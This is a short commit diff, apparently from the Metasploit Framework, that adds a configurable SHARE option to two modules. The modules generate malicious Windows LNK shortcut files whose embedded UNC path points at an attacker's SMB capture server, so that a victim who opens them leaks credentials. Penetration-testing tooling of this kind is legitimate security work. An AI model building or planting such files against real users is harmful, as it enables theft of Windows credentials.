Includes share datastore option in UNC path

msutovsky-r7 · msutovsky-r7 · commit 310b8b7f8a56 · 2025-09-29T11:37:42.000+02:00
diff --git a/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb b/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb
@@ -141,7 +141,9 @@ def create_lnk_file
     data += [env_block_sig].pack('V')
 
     # Target field in ANSI (260 bytes)
-    unc_path = get_unc_path
+    unc_share = datastore['SHARE']
+    unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?
+    unc_path = "\\\\#{srvhost}\\#{unc_share}"
 
     # Create fixed-size ANSI buffer with nulls
     ansi_buffer = "\x00".b * 260
diff --git a/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb b/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb
@@ -64,8 +64,9 @@ def run
     icon_path = "%SystemRoot%\\System32\\#{Faker::File.file_name(ext: 'ico')}.to_s}%SystemRoot%\System32\shell32.dll" if icon_path.blank?
 
     start_smb_capture_server
-
-    unc_path = "\\\\#{srvhost}\\\\#{Rex::Text.rand_text_alphanumeric(6)}"
+    unc_share = datastore['SHARE']
+    unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?
+    unc_path = "\\\\#{srvhost}\\\\#{unc_share}"
     lnk_data = create_lnk_file(description, icon_path, unc_path)
     filename = file_create(lnk_data)
     print_good("LNK file created: #{filename}")
